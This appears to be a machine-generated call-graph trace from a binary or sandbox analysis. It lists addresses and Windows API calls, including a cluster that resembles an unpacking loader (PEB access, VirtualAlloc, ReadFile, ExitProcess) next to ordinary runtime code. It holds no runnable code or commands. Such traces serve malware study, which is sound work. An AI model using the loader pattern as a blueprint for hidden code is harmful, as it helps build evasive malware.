86430->86309 86431->86313 86433 40c060 75 API calls 86432->86433 86434 401f90 86433->86434 86435 402940 86434->86435 86436 40294a __write_nolock 86435->86436 86519 4021e0 86436->86519 86439 402972 86449 4029a4 86439->86449 86531 401cf0 86439->86531 86441 402a8c 86442 401b70 75 API calls 86441->86442 86448 402abe 86441->86448 86444 402ab3 86442->86444 86443 401b70 75 API calls 86443->86449 86542 40d970 75 API calls 2 library calls 86444->86542 86446 401cf0 75 API calls 86446->86449 86448->86324 86449->86441 86449->86443 86449->86446 86534 402ae0 86449->86534 86541 40d970 75 API calls 2 library calls 86449->86541 86451 40f5e0 152 API calls 86450->86451 86452 40ff9e 86451->86452 86453 40ffa6 86452->86453 86552 452574 86452->86552 86453->86326 86455 42b6d8 86456 42b6e6 86455->86456 86457 434fe1 106 API calls 86455->86457 86458 413a88 __read_nolock 67 API calls 86456->86458 86457->86456 86459 42b6f5 86458->86459 86460 434fe1 106 API calls 86459->86460 86461 42b702 86460->86461 86461->86326 86463 41171a 75 API calls 86462->86463 86464 401fd6 86463->86464 86464->86329 86466 401a03 86465->86466 86471 4019e5 86465->86471 86467 401a1a 86466->86467 86466->86471 86591 404260 76 API calls 86467->86591 86469 4019ff 86469->86332 86470 401a26 86470->86332 86471->86469 86590 404260 76 API calls 86471->86590 86474 40c3e4 86473->86474 86475 40c42c 86473->86475 86478 40c3f0 86474->86478 86479 42a475 86474->86479 86476 42a422 86475->86476 86477 40c435 86475->86477 86483 42a427 86476->86483 86484 42a445 86476->86484 86480 40c441 86477->86480 86481 42a455 86477->86481 86592 4042f0 75 API calls __cinit 86478->86592 86597 453155 75 API calls 86479->86597 86593 4042f0 75 API calls __cinit 86480->86593 86596 453155 75 API calls 86481->86596 86490 40c3fb 86483->86490 86594 453155 75 API calls 86483->86594 86595 453155 75 API calls 86484->86595 86490->86342 86490->86490 86492 41171a 75 API calls 86491->86492 86493 40c088 86492->86493 86494 41171a 75 API calls 86493->86494 86495 402061 86494->86495 86496 401a70 86495->86496 86497 401a90 86496->86497 86498 401a77 86496->86498 86500 4021e0 75 API calls 86497->86500 86499 401a8d 86498->86499 86598 404080 75 API calls _realloc 86498->86598 86499->86346 86501 401a9c 86500->86501 86501->86346 86504 4115e1 86503->86504 86505 411650 86503->86505 86510 40207d 86504->86510 86599 417f23 67 API calls __getptd_noexit 86504->86599 86601 4114bf 79 API calls 3 library calls 86505->86601 86508 4115ed 86600 417ebb 6 API calls 2 library calls 86508->86600 86510->86349 86510->86350 86511->86378 86512->86380 86513->86385 86514->86385 86516 40df61 86515->86516 86517 40df56 86515->86517 86516->86373 86602 404080 75 API calls _realloc 86517->86602 86520 4021f1 _wcslen 86519->86520 86521 42a598 86519->86521 86524 402205 86520->86524 86525 402226 86520->86525 86547 40c740 86521->86547 86523 42a5a2 86543 404020 75 API calls ctype 86524->86543 86544 401380 86525->86544 86529 40220c _realloc 86529->86439 86530 41171a 75 API calls 86530->86529 86532 402ae0 75 API calls 86531->86532 86533 401cf7 86532->86533 86533->86439 86535 42a06a 86534->86535 86536 402aef 86534->86536 86537 401380 75 API calls 86535->86537 86536->86449 86538 42a072 86537->86538 86539 41171a 75 API calls 86538->86539 86540 42a095 _realloc 86539->86540 86540->86449 86541->86449 86542->86448 86543->86529 86545 41171a 75 API calls 86544->86545 86546 401387 86545->86546 86546->86523 86546->86530 86548 40c752 86547->86548 86549 40c747 86547->86549 86548->86523 86549->86548 86550 402ae0 75 API calls 86549->86550 86551 42a572 _realloc 86550->86551 86551->86523 86553 41557c _fseek 105 API calls 86552->86553 86554 4525df 86553->86554 86555 4523ce 114 API calls 86554->86555 86556 4525f8 86555->86556 86557 4525fc 86556->86557 86558 4151b0 __fread_nolock 81 API calls 86556->86558 86557->86455 86559 45261d 86558->86559 86560 4151b0 __fread_nolock 81 API calls 86559->86560 86561 45262e 86560->86561 86562 4151b0 __fread_nolock 81 API calls 86561->86562 86563 452649 86562->86563 86564 4151b0 __fread_nolock 81 API calls 86563->86564 86565 452666 86564->86565 86566 41557c _fseek 105 API calls 86565->86566 86567 452682 86566->86567 86568 4138ba _malloc 67 API calls 86567->86568 86569 45268e 86568->86569 86570 4138ba _malloc 67 API calls 86569->86570 86571 45269b 86570->86571 86572 4151b0 __fread_nolock 81 API calls 86571->86572 86573 4526ac 86572->86573 86574 44afdc GetSystemTimeAsFileTime 86573->86574 86575 4526bf 86574->86575 86576 4526d5 86575->86576 86577 4526fd 86575->86577 86578 413a88 __read_nolock 67 API calls 86576->86578 86579 452704 86577->86579 86580 45275b 86577->86580 86581 4526df 86578->86581 86589 44b195 139 API calls __fcloseall 86579->86589 86583 413a88 __read_nolock 67 API calls 86580->86583 86585 413a88 __read_nolock 67 API calls 86581->86585 86584 452759 86583->86584 86584->86455 86587 4526e8 86585->86587 86586 452753 86588 413a88 __read_nolock 67 API calls 86586->86588 86587->86455 86588->86584 86589->86586 86590->86469 86591->86470 86592->86490 86593->86490 86594->86490 86595->86481 86596->86490 86597->86490 86598->86499 86599->86508 86601->86510 86602->86516 86603->86395 86605 410148 SHGetDesktopFolder 86604->86605 86608 4101a3 _wcscpy 86604->86608 86606 41015a _wcscpy 86605->86606 86605->86608 86607 41018a SHGetPathFromIDListW 86606->86607 86606->86608 86607->86608 86608->86398 86609->86400 86611 40f5e0 152 API calls 86610->86611 86612 40f417 86611->86612 86613 42ca37 86612->86613 86614 40f42c 86612->86614 86615 42ca1f 86612->86615 86616 452574 140 API calls 86613->86616 86655 4037e0 139 API calls 7 library calls 86614->86655 86656 43717f 110 API calls _printf 86615->86656 86619 42ca50 86616->86619 86620 42ca76 86619->86620 86621 42ca54 86619->86621 86625 41171a 75 API calls 86620->86625 86624 434fe1 106 API calls 86621->86624 86622 40f446 86622->86396 86623 42ca2d 86623->86613 86626 42ca5e 86624->86626 86631 42cacc ctype 86625->86631 86657 43717f 110 API calls _printf 86626->86657 86628 42ca6c 86628->86620 86629 42ccc3 86630 413a88 __read_nolock 67 API calls 86629->86630 86632 42cccd 86630->86632 86631->86629 86638 401b70 75 API calls 86631->86638 86641 402cc0 86631->86641 86649 4026a0 86631->86649 86658 445051 75 API calls _realloc 86631->86658 86659 44c80c 87 API calls 3 library calls 86631->86659 86660 44b408 75 API calls 86631->86660 86633 434fe1 106 API calls 86632->86633 86634 42ccda 86633->86634 86638->86631 86642 402d71 86641->86642 86648 402cd2 _realloc ctype 86641->86648 86645 41171a 75 API calls 86642->86645 86643 41171a 75 API calls 86644 402cd9 86643->86644 86646 402cff 86644->86646 86647 41171a 75 API calls 86644->86647 86645->86648 86646->86631 86647->86646 86648->86643 86650 4026af 86649->86650 86652 40276b 86649->86652 86651 41171a 75 API calls 86650->86651 86650->86652 86653 4026ee ctype 86650->86653 86651->86653 86652->86631 86653->86652 86654 41171a 75 API calls 86653->86654 86654->86653 86655->86622 86656->86623 86657->86628 86658->86631 86659->86631 86660->86631 86661->86407 86662->86408 86664 401bfb 86663->86664 86684 401cde 86663->86684 86686 4013a0 86664->86686 86667 42a9a0 LoadStringW 86670 42a9bb 86667->86670 86668 401c18 86669 4021e0 75 API calls 86668->86669 86671 401c2d 86669->86671 86672 40df50 75 API calls 86670->86672 86673 401c3a 86671->86673 86674 42a9cd 86671->86674 86680 401c53 _memset _wcscpy _wcsncpy 86672->86680 86673->86670 86675 401c44 86673->86675 86692 40d3b0 75 API calls 2 library calls 86674->86692 86691 40d3b0 75 API calls 2 library calls 86675->86691 86678 42a9dc 86679 42a9f0 86678->86679 86678->86680 86693 40d3b0 75 API calls 2 library calls 86679->86693 86683 401cc2 Shell_NotifyIconW 86680->86683 86682 42a9fe 86683->86684 86684->86419 86685->86414 86687 41171a 75 API calls 86686->86687 86688 4013c4 86687->86688 86689 401380 75 API calls 86688->86689 86690 4013d3 86689->86690 86690->86667 86690->86668 86691->86680 86692->86678 86693->86682 84965 2e54400 84979 2e52050 84965->84979 84967 2e544da 84982 2e542f0 84967->84982 84969 2e54503 CreateFileW 84971 2e54557 84969->84971 84972 2e54552 84969->84972 84971->84972 84973 2e5456e VirtualAlloc 84971->84973 84973->84972 84974 2e5458c ReadFile 84973->84974 84974->84972 84975 2e545a7 84974->84975 84976 2e532f0 13 API calls 84975->84976 84978 2e545da 84976->84978 84977 2e545fd ExitProcess 84977->84972 84978->84977 84985 2e55500 GetPEB 84979->84985 84981 2e526db 84981->84967 84983 2e542f9 Sleep 84982->84983 84984 2e54307 84983->84984 84986 2e5552a 84985->84986 84986->84981 86694 40ab16 86695 40ab50 86694->86695 86696 41171a 75 API calls 86695->86696 86703 40ab9e ctype 86696->86703 86697 40ac10 86698 42f332 86697->86698 86700 40ac53 ctype 86697->86700 86735 45e62e 116 API calls 3 library calls 86698->86735 86701 40ac5f ctype 86700->86701 86706 4092c0 VariantClear 86700->86706 86702 42f2bd 86736 44b92e VariantClear 86702->86736 86703->86697 86703->86702 86704 40af91 86703->86704 86707 41171a 75 API calls 86703->86707 86708 42ebac VariantClear 86703->86708 86710 42ee49 VariantClear 86703->86710 86713 40c000 76 API calls 86703->86713 86714 40e380 VariantClear 86703->86714 86715 401b70 75 API calls 86703->86715 86718 409030 86703->86718 86733 452d91 VariantClear 86703->86733 86734 452d55 76 API calls 86703->86734 86732 409210 VariantClear 86704->86732 86706->86700 86707->86703 86708->86703 86710->86703 86711 42f3ae 86713->86703 86714->86703 86715->86703 86737 409110 117 API calls 86718->86737 86720 42ceb6 86746 410ae0 VariantClear ctype 86720->86746 86722 40906e 86722->86720 86724 42cea9 86722->86724 86726 4090a4 86722->86726 86723 42cebf 86745 45e62e 116 API calls 3 library calls 86724->86745 86738 404160 86726->86738 86729 4090f0 ctype 86729->86703 86730 4092c0 VariantClear 86731 4090be ctype 86730->86731 86731->86729 86731->86730 86732->86700 86733->86703 86734->86703 86735->86702 86736->86711 86737->86722 86739 4092c0 VariantClear 86738->86739 86740 40416e 86739->86740 86741 404120 VariantClear 86740->86741 86742 40419b 86741->86742 86747 4734b7 86742->86747 86743 4041c6 86743->86720 86743->86731 86745->86720 86746->86723 86748 453063 111 API calls 86747->86748 86749 4734d7 86748->86749 86750 473545 86749->86750 86751 47350c 86749->86751 86791 463c42 86750->86791 86752 4092c0 VariantClear 86751->86752 86759 473514 86752->86759 86754 473558 86755 47355c 86754->86755 86772 473595 86754->86772 86756 4092c0 VariantClear 86755->86756 86765 473564 86756->86765 86757 473616 86804 463d7e 86757->86804 86759->86743 86760 473622 86762 473697 86760->86762 86763 47362c 86760->86763 86761 453063 111 API calls 86761->86772 86838 457838 86762->86838 86766 4092c0 VariantClear 86763->86766 86765->86743 86769 473634 86766->86769 86769->86743 86771 473655 86774 4092c0 VariantClear 86771->86774 86772->86757 86772->86761 86772->86771 86850 462f5a 87 API calls __wcsicoll 86772->86850 86785 47365d 86774->86785 86775 4736b0 86851 45e62e 116 API calls 3 library calls 86775->86851 86776 4736c9 86852 40e7e0 76 API calls 86776->86852 86779 4736ba GetCurrentProcess TerminateProcess 86779->86776 86780 4736db 86787 4736ff 86780->86787 86853 40d030 76 API calls 86780->86853 86781 473731 86788 473744 FreeLibrary 86781->86788 86789 47374b 86781->86789 86783 4736f1 86854 46b945 134 API calls 2 library calls 86783->86854 86785->86743 86787->86781 86855 40d030 76 API calls 86787->86855 86856 46b945 134 API calls 2 library calls 86787->86856 86788->86789 86789->86743 86857 45335b 76 API calls 86791->86857 86793 463c5d 86858 442c52 80 API calls _wcslen 86793->86858 86795 463c72 86797 40c060 75 API calls 86795->86797 86803 463cac 86795->86803 86798 463c8e 86797->86798 86859 4608ce 75 API calls _realloc 86798->86859 86800 463ca4 86802 40c740 75 API calls 86800->86802 86801 463cf7 86801->86754 86802->86803 86803->86801 86860 462f5a 87 API calls __wcsicoll 86803->86860 86805 453063 111 API calls 86804->86805 86806 463d99 86805->86806 86807 463de0 86806->86807 86808 463dca 86806->86808 86861 40c760 78 API calls 86807->86861 86809 453081 111 API calls 86808->86809 86811 463dd0 LoadLibraryW 86809->86811 86813 463e09 86811->86813 86812 463de7 86817 463e19 86812->86817 86862 40c760 78 API calls 86812->86862 86815 463e3e 86813->86815 86813->86817 86818 463e4e 86815->86818 86819 463e7b 86815->86819 86816 463dfb 86816->86817 86863 40c760 78 API calls 86816->86863 86817->86760 86864 40d500 75 API calls 86818->86864 86866 40c760 78 API calls 86819->86866 86823 463e57 86865 45efe7 77 API calls ctype 86823->86865 86824 463e82 GetProcAddress 86827 463e90 86824->86827 86826 463e62 GetProcAddress 86829 463e79 86826->86829 86827->86817 86828 463edf 86827->86828 86827->86829 86828->86817 86832 463eef FreeLibrary 86828->86832 86829->86827 86867 403470 75 API calls _realloc 86829->86867 86831 463eb4 86868 40d500 75 API calls 86831->86868 86832->86817 86834 463ebd 86869 45efe7 77 API calls ctype 86834->86869 86836 463ec8 GetProcAddress 86870 401330 ctype 86836->86870 86839 457a4c 86838->86839 86845 45785f _strcat _wcslen _wcscpy ctype 86838->86845 86846 410d40 86839->86846 86840 40c760 78 API calls 86840->86845 86841 453081 111 API calls 86841->86845 86842 443576 78 API calls 86842->86845 86843 4138ba 67 API calls _malloc 86843->86845 86844 40f580 77 API calls 86844->86845 86845->86839 86845->86840 86845->86841 86845->86842 86845->86843 86845->86844 86848 410d55 86846->86848 86847 410ded VirtualProtect 86849 410dbb 86847->86849 86848->86847 86848->86849 86849->86775 86849->86776 86850->86772 86851->86779 86852->86780 86853->86783 86854->86787 86855->86787 86856->86787 86857->86793 86858->86795 86859->86800 86860->86801 86861->86812 86862->86816 86863->86813 86864->86823 86865->86826 86866->86824 86867->86831 86868->86834 86869->86836 86870->86828 86871 42919b 86876 40ef10 86871->86876 86874 411421 __cinit 74 API calls 86875 4291aa 86874->86875 86877 41171a 75 API calls 86876->86877 86878 40ef17 86877->86878 86879 42ad48 86878->86879 86884 40ef40 74 API calls __cinit 86878->86884 86881 40ef2a 86885 40e470 86881->86885 86884->86881 86886 40c060 75 API calls 86885->86886 86887 40e483 GetVersionExW 86886->86887 86888 4021e0 75 API calls 86887->86888 86889 40e4bb 86888->86889 86911 40e600 86889->86911 86894 42accc 86897 42ad28 GetSystemInfo 86894->86897 86900 42ad38 GetSystemInfo 86897->86900 86898 40e557 GetCurrentProcess 86931 40ee30 LoadLibraryA GetProcAddress 86898->86931 86899 40e56c 86899->86900 86924 40eee0 86899->86924 86904 40e5c9 86928 40eea0 86904->86928 86907 40e5e0 86909 40e5f1 FreeLibrary 86907->86909 86910 40e5f4 86907->86910 86908 40e5dd FreeLibrary 86908->86907 86909->86910 86910->86874 86912 40e60b 86911->86912 86913 40c740 75 API calls 86912->86913 86914 40e4c2 86913->86914 86915 40e620 86914->86915 86916 40e62a 86915->86916 86917 42ac93 86916->86917 86918 40c740 75 API calls 86916->86918 86919 40e4ce 86918->86919 86919->86894 86920 40ee70 86919->86920 86921 40e551 86920->86921 86922 40ee76 LoadLibraryA 86920->86922 86921->86898 86921->86899 86922->86921 86923 40ee87 GetProcAddress 86922->86923 86923->86921 86925 40e5bf 86924->86925 86926 40eee6 LoadLibraryA 86924->86926 86925->86897 86925->86904 86926->86925 86927 40eef7 GetProcAddress 86926->86927 86927->86925 86932 40eec0 LoadLibraryA GetProcAddress 86928->86932 86930 40e5d3 GetNativeSystemInfo 86930->86907 86930->86908 86931->86899 86932->86930 84987 46caaa 84988 46cac6 84987->84988 84989 46cad1 84987->84989 85132 40c760 78 API calls 84988->85132 85128 453063 84989->85128 84992 46cd92 84993 46cae0 84993->84992 84994 46caed 84993->84994 84995 46cbeb 84993->84995 84996 453081 111 API calls 84994->84996 85037 40f5e0 84995->85037 85006 46caf8 _wcscpy _wcschr 84996->85006 84999 46cc13 85056 453081 84999->85056 85000 46cc01 85139 404120 85000->85139 85003 46cbc4 85135 4092c0 85003->85135 85004 46cc39 85062 413db0 85004->85062 85011 46cb16 _wcscat _wcscpy 85006->85011 85014 46cb44 _wcscat 85006->85014 85008 46cbd0 85009 453081 111 API calls 85010 46cb5e _wcscpy 85009->85010 85133 436ac4 GetFileAttributesW 85010->85133 85012 453081 111 API calls 85011->85012 85012->85014 85014->85009 85015 46cb79 _wcslen 85015->85003 85017 453081 111 API calls 85015->85017 85016 46cc3f _wcscat _wcscpy 85019 453081 111 API calls 85016->85019 85018 46cbae 85017->85018 85134 44bd29 103 API calls 4 library calls 85018->85134 85021 46cce4 85019->85021 85065 436879 85021->85065 85022 46cbb9 85022->84992 85022->85003 85024 46ccea 85072 436b22 85024->85072 85027 46cd02 85028 4092c0 VariantClear 85027->85028 85030 46cd46 85028->85030 85029 453081 111 API calls 85031 46cd1b 85029->85031 85143 434fe1 85030->85143 85075 452788 85031->85075 85034 46cd26 85034->85030 85036 404120 VariantClear 85034->85036 85036->85027 85147 40f580 85037->85147 85039 40f5f8 _strcat ctype 85155 40f6d0 85039->85155 85044 42b2ee 85184 4151b0 85044->85184 85046 40f679 85046->85044 85047 40f681 85046->85047 85171 414e94 85047->85171 85051 40f68b 85051->84999 85051->85000 85053 42b31d 85190 415484 85053->85190 85055 42b33d 85057 4530aa 85056->85057 85059 45308c 85056->85059 85057->85004 85058 4530a1 85058->85004 85059->85058 85974 452e2a 111 API calls 5 library calls 85059->85974 85061 453098 85061->85004 85975 413b95 85062->85975 85066 436883 _wcschr __write_nolock 85065->85066 85067 4368a2 _wcscpy 85066->85067 85068 413db0 __wsplitpath 67 API calls 85066->85068 85067->85024 85069 4368df 85068->85069 85070 413db0 __wsplitpath 67 API calls 85069->85070 85071 436905 _wcscat _wcscpy 85070->85071 85071->85024 86005 436ade GetFileAttributesW 85072->86005 85074 436b2c 85074->85027 85074->85029 85076 452798 __write_nolock 85075->85076 85077 4431e0 GetSystemTimeAsFileTime 85076->85077 85078 4527ec 85077->85078 85079 41557c _fseek 105 API calls 85078->85079 85080 452801 85079->85080 85081 4528f1 85080->85081 85082 45281a 85080->85082 85084 4523ce 114 API calls 85081->85084 86027 4523ce 85082->86027 85100 4528b5 _wcscat 85084->85100 85086 45282d 85086->85034 85087 413db0 __wsplitpath 67 API calls 85092 452861 _wcscat _wcscpy 85087->85092 85088 4151b0 __fread_nolock 81 API calls 85089 452919 85088->85089 85090 4151b0 __fread_nolock 81 API calls 85089->85090 85091 45292a 85090->85091 85093 4151b0 __fread_nolock 81 API calls 85091->85093 85095 413db0 __wsplitpath 67 API calls 85092->85095 85094 452949 85093->85094 85096 4151b0 __fread_nolock 81 API calls 85094->85096 85095->85100 85097 45295a 85096->85097 85098 4151b0 __fread_nolock 81 API calls 85097->85098 85099 45297b 85098->85099 85101 4151b0 __fread_nolock 81 API calls 85099->85101 85100->85086 85100->85088 85102 45298c 85101->85102 85103 4151b0 __fread_nolock 81 API calls 85102->85103 85104 45299d 85103->85104 85105 4151b0 __fread_nolock 81 API calls 85104->85105 85106 4529ae 85105->85106 86010 434fa9 GetTempPathW GetTempFileNameW 85106->86010 85108 4529be 85109 414e06 138 API calls 85108->85109 85123 4529d0 85109->85123 85110 4529db 85110->85034 85111 452aa3 85112 414e94 __fcloseall 106 API calls 85111->85112 85113 452aad 85112->85113 85114 452ad6 85113->85114 85115 452aba DeleteFileW 85113->85115 85116 452b6d CopyFileW 85114->85116 85121 452ae1 _wcscpy 85114->85121 85115->85034 85118 452b84 DeleteFileW 85116->85118 85119 452ba0 DeleteFileW 85116->85119 85117 4151b0 __fread_nolock 81 API calls 85117->85123 85118->85034 86024 434f66 CreateFileW 85119->86024 86033 44b195 139 API calls __fcloseall 85121->86033 85123->85110 85123->85111 85123->85117 86011 4146ce 85123->86011 85126 452b4d 85126->85119 85127 452b51 DeleteFileW 85126->85127 85127->85034 85129 45307a 85128->85129 85130 45306e 85128->85130 85129->84993 85130->85129 86052 452e2a 111 API calls 5 library calls 85130->86052 85132->84989 85133->85015 85134->85022 85136 4092c8 ctype 85135->85136 85137 429db0 VariantClear 85136->85137 85138 4092d5 ctype 85136->85138 85137->85138 85138->85008 85140 40412e 85139->85140 85141 4092c0 VariantClear 85140->85141 85142 404138 85141->85142 85142->85003 85144 434feb 85143->85144 85146 434ff1 85143->85146 85145 414e94 __fcloseall 106 API calls 85144->85145 85145->85146 85148 429440 85147->85148 85149 40f589 _wcslen 85147->85149 85150 40f58f WideCharToMultiByte 85149->85150 85151 40f5d8 85150->85151 85152 40f5ad 85150->85152 85151->85039 85153 41171a 75 API calls 85152->85153 85154 40f5bb WideCharToMultiByte 85153->85154 85154->85039 85156 40f6dd _strlen 85155->85156 85203 40f790 85156->85203 85159 414e06 85222 414d40 85159->85222 85161 40f666 85161->85044 85162 40f450 85161->85162 85166 40f45a _strcat _realloc __write_nolock 85162->85166 85163 4151b0 __fread_nolock 81 API calls 85163->85166 85165 42936d 85167 41557c _fseek 105 API calls 85165->85167 85166->85163 85166->85165 85170 40f531 85166->85170 85619 41557c 85166->85619 85168 429394 85167->85168 85169 4151b0 __fread_nolock 81 API calls 85168->85169 85169->85170 85170->85046 85172 414ea0 __setmode 85171->85172 85173 414ed1 85172->85173 85174 414eb4 85172->85174 85176 415965 __lock_file 68 API calls 85173->85176 85180 414ec9 __setmode 85173->85180 85737 417f23 67 API calls __getptd_noexit 85174->85737 85178 414ee9 85176->85178 85177 414eb9 85738 417ebb 6 API calls 2 library calls 85177->85738 85721 414e1d 85178->85721 85180->85051 85776 41511a 85184->85776 85186 4151c8 85187 44afdc 85186->85187 85967 4431e0 85187->85967 85189 44affd 85189->85053 85191 415490 __setmode 85190->85191 85192 4154bb 85191->85192 85193 41549e 85191->85193 85195 415965 __lock_file 68 API calls 85192->85195 85971 417f23 67 API calls __getptd_noexit 85193->85971 85197 4154c3 85195->85197 85196 4154a3 85972 417ebb 6 API calls 2 library calls 85196->85972 85199 4152e7 __ftell_nolock 71 API calls 85197->85199 85200 4154cf 85199->85200 85973 4154e8 LeaveCriticalSection LeaveCriticalSection _fseek 85200->85973 85202 4154b3 __setmode 85202->85055 85204 40f7ae _memset 85203->85204 85206 40f628 85204->85206 85207 415258 85204->85207 85206->85159 85208 415285 85207->85208 85209 415268 85207->85209 85208->85209 85210 41528c 85208->85210 85218 417f23 67 API calls __getptd_noexit 85209->85218 85220 41c551 103 API calls 15 library calls 85210->85220 85212 41526d 85219 417ebb 6 API calls 2 library calls 85212->85219 85215 4152b2 85216 41527d 85215->85216 85221 4191c9 101 API calls 7 library calls 85215->85221 85216->85204 85218->85212 85220->85215 85221->85216 85223 414d4c __setmode 85222->85223 85224 414d5f 85223->85224 85227 414d95 85223->85227 85274 417f23 67 API calls __getptd_noexit 85224->85274 85226 414d64 85275 417ebb 6 API calls 2 library calls 85226->85275 85241 41e28c 85227->85241 85230 414d9a 85231 414da1 85230->85231 85232 414dae 85230->85232 85276 417f23 67 API calls __getptd_noexit 85231->85276 85233 414dd6 85232->85233 85234 414db6 85232->85234 85259 41dfd8 85233->85259 85277 417f23 67 API calls __getptd_noexit 85234->85277 85238 414d74 @_EH4_CallFilterFunc@8 __setmode 85238->85161 85242 41e298 __setmode 85241->85242 85243 418407 __lock 67 API calls 85242->85243 85244 41e2a6 85243->85244 85245 41e322 85244->85245 85252 418344 __mtinitlocknum 67 API calls 85244->85252 85254 41e31b 85244->85254 85282 4159a6 68 API calls __lock 85244->85282 85283 415a14 LeaveCriticalSection LeaveCriticalSection _doexit 85244->85283 85247 416fb6 __malloc_crt 67 API calls 85245->85247 85249 41e32c 85247->85249 85248 41e3b0 __setmode 85248->85230 85249->85254 85284 4189e6 InitializeCriticalSectionAndSpinCount __setmode 85249->85284 85252->85244 85253 41e351 85255 41e35c 85253->85255 85256 41e36f EnterCriticalSection 85253->85256 85279 41e3bb 85254->85279 85258 413a88 __read_nolock 67 API calls 85255->85258 85256->85254 85258->85254 85268 41dffb __wopenfile 85259->85268 85260 41e015 85289 417f23 67 API calls __getptd_noexit 85260->85289 85261 41e1e9 85261->85260 85264 41e247 85261->85264 85263 41e01a 85290 417ebb 6 API calls 2 library calls 85263->85290 85286 425db0 85264->85286 85268->85260 85268->85261 85291 4136bc 79 API calls 2 library calls 85268->85291 85270 41e1e2 85270->85261 85292 4136bc 79 API calls 2 library calls 85270->85292 85272 41e201 85272->85261 85293 4136bc 79 API calls 2 library calls 85272->85293 85274->85226 85276->85238 85277->85238 85278 414dfc LeaveCriticalSection LeaveCriticalSection _fseek 85278->85238 85285 41832d LeaveCriticalSection 85279->85285 85281 41e3c2 85281->85248 85282->85244 85283->85244 85284->85253 85285->85281 85294 425ce4 85286->85294 85288 414de1 85288->85278 85289->85263 85291->85270 85292->85272 85293->85261 85295 425cf0 __setmode 85294->85295 85296 425d03 85295->85296 85298 425d41 85295->85298 85366 417f23 67 API calls __getptd_noexit 85296->85366 85305 4255c4 85298->85305 85299 425d08 85367 417ebb 6 API calls 2 library calls 85299->85367 85304 425d17 __setmode 85304->85288 85306 4255e9 85305->85306 85369 41440a 85306->85369 85309 42560a 85393 417d93 10 API calls 3 library calls 85309->85393 85311 425614 85315 425617 85311->85315 85312 42564d 85394 417f36 67 API calls __getptd_noexit 85312->85394 85314 425652 85395 417f23 67 API calls __getptd_noexit 85314->85395 85315->85312 85319 42570d 85315->85319 85317 42565c 85396 417ebb 6 API calls 2 library calls 85317->85396 85375 41bb02 85319->85375 85321 4257af 85322 4257d0 CreateFileW 85321->85322 85323 4257b6 85321->85323 85325 42586a GetFileType 85322->85325 85326 4257fd 85322->85326 85397 417f36 67 API calls __getptd_noexit 85323->85397 85327 425877 GetLastError 85325->85327 85328 4258bb 85325->85328 85330 425836 GetLastError 85326->85330 85331 425811 CreateFileW 85326->85331 85401 417f49 67 API calls 3 library calls 85327->85401 85403 41b8bd 68 API calls 2 library calls 85328->85403 85329 4257bb 85398 417f23 67 API calls __getptd_noexit 85329->85398 85399 417f49 67 API calls 3 library calls 85330->85399 85331->85325 85331->85330 85335 4258a0 CloseHandle 85337 4257c5 85335->85337 85338 4258ae 85335->85338 85400 417f23 67 API calls __getptd_noexit 85337->85400 85402 417f23 67 API calls __getptd_noexit 85338->85402 85341 4258b3 85341->85337 85342 425afa 85345 425c67 CloseHandle CreateFileW 85342->85345 85365 42566b 85342->85365 85343 4258d9 85343->85342 85357 42594f 85343->85357 85404 41ef5f 85343->85404 85347 425c92 GetLastError 85345->85347 85348 425cc0 85345->85348 85457 417f49 67 API calls 3 library calls 85347->85457 85348->85365 85351 425c9e 85458 41b93e 68 API calls 2 library calls 85351->85458 85354 41e7dc 77 API calls __read_nolock 85354->85357 85357->85342 85357->85354 85358 425b62 85357->85358 85359 425981 85357->85359 85362 41ef5f 69 API calls __lseek_nolock 85357->85362 85415 41e517 85357->85415 85432 41c3cf 85357->85432 85360 41e517 __close_nolock 70 API calls 85358->85360 85359->85357 85361 423462 69 API calls __lseeki64_nolock 85359->85361 85430 426da1 105 API calls 5 library calls 85359->85430 85363 425b69 85360->85363 85361->85359 85362->85357 85431 417f23 67 API calls __getptd_noexit 85363->85431 85368 425d82 LeaveCriticalSection __unlock_fhandle 85365->85368 85366->85299 85368->85304 85370 414419 85369->85370 85372 41442e 85369->85372 85459 417f23 67 API calls __getptd_noexit 85370->85459 85372->85309 85372->85315 85373 41441e 85460 417ebb 6 API calls 2 library calls 85373->85460 85376 41bb0e __setmode 85375->85376 85377 418344 __mtinitlocknum 67 API calls 85376->85377 85378 41bb1e 85377->85378 85379 418407 __lock 67 API calls 85378->85379 85380 41bb23 __setmode 85378->85380 85388 41bb32 85379->85388 85380->85321 85381 41bc0b 85463 416ffb 85381->85463 85385 418407 __lock 67 API calls 85385->85388 85386 41bbb3 EnterCriticalSection 85387 41bbc3 LeaveCriticalSection 85386->85387 85386->85388 85387->85388 85388->85381 85388->85385 85388->85386 85392 41bc75 85388->85392 85461 4189e6 InitializeCriticalSectionAndSpinCount __setmode 85388->85461 85462 41bbd5 LeaveCriticalSection _doexit 85388->85462 85479 41bc93 LeaveCriticalSection _doexit 85392->85479 85393->85311 85394->85314 85395->85317 85397->85329 85398->85337 85399->85337 85400->85365 85401->85335 85402->85341 85403->85343 85495 41b9c4 85404->85495 85406 41ef6e 85407 41ef84 SetFilePointer 85406->85407 85408 41ef74 85406->85408 85410 41ef9b GetLastError 85407->85410 85411 41efa3 85407->85411 85508 417f23 67 API calls __getptd_noexit 85408->85508 85410->85411 85412 41ef79 85411->85412 85509 417f49 67 API calls 3 library calls 85411->85509 85412->85357 85414 417f36 67 API calls __getptd_noexit 85412->85414 85414->85357 85416 41b9c4 __commit 67 API calls 85415->85416 85419 41e527 85416->85419 85417 41e57d 85515 41b93e 68 API calls 2 library calls 85417->85515 85419->85417 85420 41b9c4 __commit 67 API calls 85419->85420 85429 41e55b 85419->85429 85425 41e552 85420->85425 85421 41b9c4 __commit 67 API calls 85422 41e567 CloseHandle 85421->85422 85422->85417 85426 41e573 GetLastError 85422->85426 85423 41e585 85424 41e5a7 85423->85424 85516 417f49 67 API calls 3 library calls 85423->85516 85424->85357 85428 41b9c4 __commit 67 API calls 85425->85428 85426->85417 85428->85429 85429->85417 85429->85421 85430->85359 85431->85365 85433 41c3db __setmode 85432->85433 85434 41c3e3 85433->85434 85435 41c3fe 85433->85435 85585 417f36 67 API calls __getptd_noexit 85434->85585 85437 41c40c 85435->85437 85442 41c44d 85435->85442 85587 417f36 67 API calls __getptd_noexit 85437->85587 85438 41c3e8 85586 417f23 67 API calls __getptd_noexit 85438->85586 85441 41c411 85588 417f23 67 API calls __getptd_noexit 85441->85588 85443 41ba3b ___lock_fhandle 68 API calls 85442->85443 85446 41c453 85443->85446 85444 41c3f0 __setmode 85444->85357 85448 41c460 85446->85448 85449 41c476 85446->85449 85447 41c418 85589 417ebb 6 API calls 2 library calls 85447->85589 85517 41bc9c 85448->85517 85590 417f23 67 API calls __getptd_noexit 